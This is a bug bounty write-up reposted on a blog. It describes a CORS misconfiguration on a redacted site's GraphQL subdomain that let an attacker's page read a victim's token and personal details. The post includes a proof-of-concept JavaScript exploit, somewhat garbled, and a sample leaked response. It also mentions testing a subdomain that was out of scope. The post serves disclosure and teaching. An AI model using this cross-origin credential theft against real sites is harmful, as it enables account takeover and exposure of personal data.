• Cors Misconfiguration : Steal victim token and PII leads to ATO
    BugBounty 2021. 3. 22. 06:00

    today i will talk about a bug i found it on July 2019 on Pvt program on HackerOne. the bug named “Cross Origin Resource Sharing Misconfiguration{CORS}”.

    1-firstly what is CORS?

    Cross-Origin Resource Sharing(CORS) is a mechanism that enables web browsers to perform cross-domain requests using the XMLHttpRequest API in a controlled manner. These cross-origin requests have an Origin header, that identifies the domain initiating the request. It defines the protocol to use between a web browser and a server to determine whether a cross-origin request is allowed.


    After reviewing the Program Scope ,I concluded all subdomains are out of scope , just the main domain are In Scope.

    3-Steps To Reproduce

    Day one : i started hunting in the main domain www.redact.com, i understand how the program services works , also testing bugs but the site is more secure..Day two : i back to my testing again , when i viewed the Source code i noticed a subdomain in the code named core-plugins.redact.com
    i know out of scope, but my mind tell test it.. 
    the subdomain core-plugins.redact.com do not have a registration page . i can just login with my account on the main domain (SSO)after login i found this request

    he printed PII info on response. Token,email,userinfo…etc 
    then i noticed the “{Access Control Allow Credentials: true}” so i changed the origin , i deleted core-plugins.redact.com and i added https://evil.com. and it’s work !

    Then i edited the graphql request to steal more info .

    4-Exploition Code


    <!DOCTYPE html>
    function cors_exploit() {
     var xhttp = new XMLHttpRequest();
     xhttp.onreadystatechange = function() {
     if (this.readyState == 4 && this.status == 200) {
     document.getElementById(“demo”).innerHTML = alert(this.responseText);
    xhttp.open(“GET”, “https://core-plugins.redact.com/graphql?app=web&query=query%20App%20{customer%20{id,...F2}}%20fragment%20F0%20on%20Customer%20{is_premier,is_premier_parent,premier_permissions,username,user_type,full_name,organization_id,customer_id,hostname,token,id}%20fragment%20F1%20on%20Customer%20{premier_permissions,is_premier_parent,id}%20fragment%20F2%20on%20Customer%20{username,full_name,email,is_admin,id,...F0,...F1}", true);
    xhttp.withCredentials = true;
    <body onload=cors_exploit()>
    <h2>Exploiting CORS Vulnerability </h2>
    <h3>Extract SID</h3><div id=cors>
    <button type=”button” onclick=cors_exploit()> Exploit</button>



    Then i uploaded it to my website www.mysite.com/cors.html and it’s work the Data was printed!!


    { “data”: { “customer”: { “id”: “u285728853”, “username”: “storedthings133776”, “full_name”: null,
    “email”: “storedthings1337@gmail.com”, “is_admin”: false, “is_premier”: false, 
    “is_premier_parent”: false, “premier_permissions”: [], “user_type”: “core user”, 
    “organization_id”: null, “customer_id”: “285728853”,“hostname”: “core-plugins.redact.com”,
    “token”: “1/eyJjbGllbnRfaWQiOiI3YTE*****************” } }, “extensions”: {} }


    5-The Token


    The attacker could Access to the victim accounts through the token And perform any actions behalf the victim and view other Endpoints in API



    Nov 19th : Report Sent

    Nov 20th: Triaged

    Nov 20th: rewarded

    — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

    That’s all, thankyou very much for reading it till the last. Hope you would have enjoyed it.Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters

    댓글 0

Designed by Tistory.